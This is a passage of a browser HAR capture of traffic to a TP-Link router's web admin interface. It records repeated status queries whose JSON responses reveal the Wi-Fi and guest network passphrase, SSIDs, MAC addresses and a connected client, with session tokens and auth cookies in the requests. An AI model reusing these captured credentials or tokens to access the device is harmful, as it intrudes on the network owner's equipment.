\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"ye
s\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.07,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"6
4\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 267,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 704,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:39.651+03:00\",\r\n \"time\": 1827,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n 
\"value\": \"198.168.0.1\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": 
\"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 262,\r\n \"dns\": 251,\r\n \"connect\": 530,\r\n \"send\": 0,\r\n \"wait\": 784,\r\n \"receive\": 0\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:49.649+03:00\",\r\n \"time\": 944,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n 
\"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-B
F-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",
\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.08,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_w
ds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 649,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:49.654+03:00\",\r\n \"time\": 1787,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": 
\"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n 
\"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 266,\r\n \"dns\": 251,\r\n \"connect\": 518,\r\n \"send\": 0,\r\n \"wait\": 752,\r\n \"receive\": 0\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:59.649+03:00\",\r\n \"time\": 976,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": 
\"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g
